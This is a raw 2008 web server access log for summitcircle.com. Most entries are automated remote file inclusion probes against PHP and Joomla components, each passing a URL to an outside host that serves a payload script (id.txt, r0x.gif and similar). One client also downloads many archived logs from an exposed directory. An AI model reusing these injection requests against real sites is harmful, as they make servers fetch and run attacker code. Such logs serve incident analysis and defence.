64.38.22.250 - - [06/Jul/2008:18:25:51 -0700] "GET /logs/access_080121.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.38.22.250 - - [06/Jul/2008:18:25:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.38.22.250 - - [06/Jul/2008:18:25:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
91.198.175.18 - - [06/Jul/2008:18:26:23 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:26:29 -0700] "GET /logs/access.log//display.php?path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:26:29 -0700] "GET //display.php?path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:26:30 -0700] "GET /logs//display.php?path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
116.125.113.115 - - [06/Jul/2008:18:26:43 -0700] "GET /impex/ImpExData.php?systempath=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "summitcircle.com"
116.125.113.115 - - [06/Jul/2008:18:26:43 -0700] "GET /logs/impex/ImpExData.php?systempath=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "summitcircle.com"
74.63.2.169 - - [06/Jul/2008:18:26:46 -0700] "GET //ws/login.php?noSet=0&includedir=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
74.63.2.169 - - [06/Jul/2008:18:26:46 -0700] "GET /logs/access_071231.log//ws/login.php?noSet=0&includedir=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
74.63.2.169 - - [06/Jul/2008:18:26:46 -0700] "GET /logs//ws/login.php?noSet=0&includedir=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
116.125.113.115 - - [06/Jul/2008:18:27:13 -0700] "GET /impex/ImpExData.php?systempath=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
116.125.113.115 - - [06/Jul/2008:18:27:13 -0700] "GET /logs/impex/ImpExData.php?systempath=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:18:27:45 -0700] "GET /logs/index.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
203.22.204.188 - - [06/Jul/2008:18:27:45 -0700] "GET /index.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
203.22.204.188 - - [06/Jul/2008:18:27:45 -0700] "GET /logs/access.log/index.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
59.126.46.141 - - [06/Jul/2008:18:27:52 -0700] "GET /logs/order/login.php?svr_rootscript=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
59.126.46.141 - - [06/Jul/2008:18:27:52 -0700] "GET /order/login.php?svr_rootscript=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
203.22.204.188 - - [06/Jul/2008:18:28:46 -0700] "GET /logs/access_071231.log/index.php?x=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
82.98.78.150 - - [06/Jul/2008:18:29:46 -0700] "GET /logs/access_080406.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:30:00 -0700] "GET /logs/access.log/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:30:01 -0700] "GET /errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:30:01 -0700] "GET /logs/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.126.46.141 - - [06/Jul/2008:18:30:17 -0700] "GET /logs/senetman/html/index.php?page=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
59.126.46.141 - - [06/Jul/2008:18:30:17 -0700] "GET /senetman/html/index.php?page=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "summitcircle.com"
216.236.255.134 - - [06/Jul/2008:18:31:47 -0700] "GET //include/write.php?dir=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.236.255.134 - - [06/Jul/2008:18:31:50 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.236.255.134 - - [06/Jul/2008:18:31:52 -0700] "GET //include/write.php?dir=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.236.255.134 - - [06/Jul/2008:18:31:57 -0700] "GET /logs//include/write.php?dir=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.177.4.235 - - [06/Jul/2008:18:34:26 -0700] "GET /logs/access_080331.log//components/com_flyspray/startdown.php?file=http://www.iwsbr.net/vitinho/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
67.177.4.235 - - [06/Jul/2008:18:34:27 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.iwsbr.net/vitinho/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.14.127.59 - - [06/Jul/2008:18:37:52 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.14.127.59 - - [06/Jul/2008:18:37:52 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.14.127.59 - - [06/Jul/2008:18:37:52 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:38:27 -0700] "GET /logs/access.log/errors.php?error=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:38:28 -0700] "GET /errors.php?error=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.178.228.12 - - [06/Jul/2008:18:38:28 -0700] "GET /logs/errors.php?error=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:38:32 -0700] "GET /index.php?open=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:38:32 -0700] "GET /logs/index.php?open=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:38:32 -0700] "GET /logs/access_070813.log/index.php?open=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:38:37 -0700] "GET /logs/access_071001.log/index.php?open=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
69.93.225.34 - - [06/Jul/2008:18:38:39 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.93.225.34 - - [06/Jul/2008:18:38:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.93.225.34 - - [06/Jul/2008:18:38:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
65.98.8.4 - - [06/Jul/2008:18:38:42 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.8.4 - - [06/Jul/2008:18:38:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
65.98.8.4 - - [06/Jul/2008:18:38:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
69.94.56.40 - - [06/Jul/2008:18:38:56 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
69.94.56.40 - - [06/Jul/2008:18:38:56 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
69.94.56.40 - - [06/Jul/2008:18:38:56 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
195.168.33.226 - - [06/Jul/2008:18:39:09 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.168.33.226 - - [06/Jul/2008:18:39:09 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
195.168.33.226 - - [06/Jul/2008:18:39:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
59.117.6.80 - - [06/Jul/2008:18:39:24 -0700] "GET /wsnlinks/link.php?action=detail&id=281 HTTP/1.1" 404 275 "http://zh.wikipedia.org/wiki/Skype" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9) Gecko/2008052906 Firefox/3.0" "www.summitcircle.com"
59.117.6.80 - - [06/Jul/2008:18:39:26 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9) Gecko/2008052906 Firefox/3.0" "www.summitcircle.com"
59.117.6.80 - - [06/Jul/2008:18:39:29 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9) Gecko/2008052906 Firefox/3.0" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:39:45 -0700] "GET /logs/access.log HTTP/1.1" 200 88365 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
216.14.127.59 - - [06/Jul/2008:18:40:22 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.76.111.11 - - [06/Jul/2008:18:40:29 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [06/Jul/2008:18:40:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
200.76.111.11 - - [06/Jul/2008:18:40:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:40:35 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 1087316 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:40:51 -0700] "GET /logs/access_070730.log HTTP/1.1" 200 1482055 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
116.125.113.115 - - [06/Jul/2008:18:40:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "summitcircle.com"
116.125.113.115 - - [06/Jul/2008:18:40:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:41:02 -0700] "GET /logs/access_070820.log HTTP/1.1" 200 1433819 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
69.93.225.34 - - [06/Jul/2008:18:41:10 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:41:13 -0700] "GET /logs/access_070903.log HTTP/1.1" 200 1579707 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
65.98.8.4 - - [06/Jul/2008:18:41:30 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:41:33 -0700] "GET /logs/access_070826.log HTTP/1.1" 200 1840130 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
195.168.33.226 - - [06/Jul/2008:18:41:44 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:41:59 -0700] "GET /logs/access_070910.log HTTP/1.1" 200 2597167 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:42:13 -0700] "GET /logs/access_070916.log HTTP/1.1" 200 2573306 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:42:20 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 2188262 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:42:39 -0700] "GET /logs/access_071112.log HTTP/1.1" 200 616420 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:43:12 -0700] "GET /logs/access_071001.log HTTP/1.1" 200 2909005 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:43:41 -0700] "GET /logs/access_071008.log HTTP/1.1" 200 3197790 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
69.94.56.40 - - [06/Jul/2008:18:43:47 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:43:56 -0700] "GET /logs/access_071015.log HTTP/1.1" 200 3508358 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
200.76.111.11 - - [06/Jul/2008:18:44:12 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
222.251.223.180 - - [06/Jul/2008:18:44:20 -0700] "GET /logs/access.log/index.php?dir=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
222.251.223.180 - - [06/Jul/2008:18:44:21 -0700] "GET /logs/index.php?dir=http://hostbox3.awardspace.com/botloginMIB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:44:43 -0700] "GET /logs/access_071021.log HTTP/1.1" 200 3998951 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:45:07 -0700] "GET /logs/access_080121.log HTTP/1.1" 200 1481287 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
72.233.58.23 - - [06/Jul/2008:18:45:29 -0700] "GET /wsnlinks/comments.php?id=122 HTTP/1.1" 404 275 "-" "-" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:45:31 -0700] "GET /logs/access_071029.log HTTP/1.1" 200 4502749 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
89.186.1.54 - - [06/Jul/2008:18:45:42 -0700] "GET /logs/access_070806.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
89.186.1.54 - - [06/Jul/2008:18:45:43 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
89.186.1.54 - - [06/Jul/2008:18:45:43 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.iesleonardodavinci.org/blogger/nucleus/libs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:45:51 -0700] "GET /logs/access_080310.log//load_lang.php?_SERWEB[serwebdir]=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:45:52 -0700] "GET //load_lang.php?_SERWEB[serwebdir]=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.29.68.220 - - [06/Jul/2008:18:45:52 -0700] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://h1.ripway.com/disconnectgp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:45:57 -0700] "GET /logs/access_080128.log HTTP/1.1" 200 1657984 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:18:45:59 -0700] "GET /display.php?table=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:18:45:59 -0700] "GET /logs/display.php?table=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
203.22.204.188 - - [06/Jul/2008:18:45:59 -0700] "GET /logs/access_071112.log/display.php?table=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:46:11 -0700] "GET /logs/access_080127.log HTTP/1.1" 200 7322271 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:46:24 -0700] "GET /logs/access_080211.log HTTP/1.1" 200 1139653 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
202.181.105.117 - - [06/Jul/2008:18:46:44 -0700] "GET /index.php?open=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:46:44 -0700] "GET /logs/access_071126.log HTTP/1.1" 200 6349729 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:46:51 -0700] "GET /logs/access_071119.log HTTP/1.1" 200 7111321 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:46:54 -0700] "GET /logs/access_080225.log HTTP/1.1" 200 1802355 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
68.21.80.84 - - [06/Jul/2008:18:47:13 -0700] "GET /logs/access_071210.log HTTP/1.1" 200 6300231 "http://www.summitcircle.com/logs" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)" "www.summitcircle.com"
62.149.200.13 - - [06/Jul/2008:18:47:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.149.200.13 - - [06/Jul/2008:18:47:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.203.245.7 - - [06/Jul/2008:18:47:38 -0700] "GET /logs/access_080210.log//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.203.245.7 - - [06/Jul/2008:18:47:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.203.245.7 - - [06/Jul/2008:18:47:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
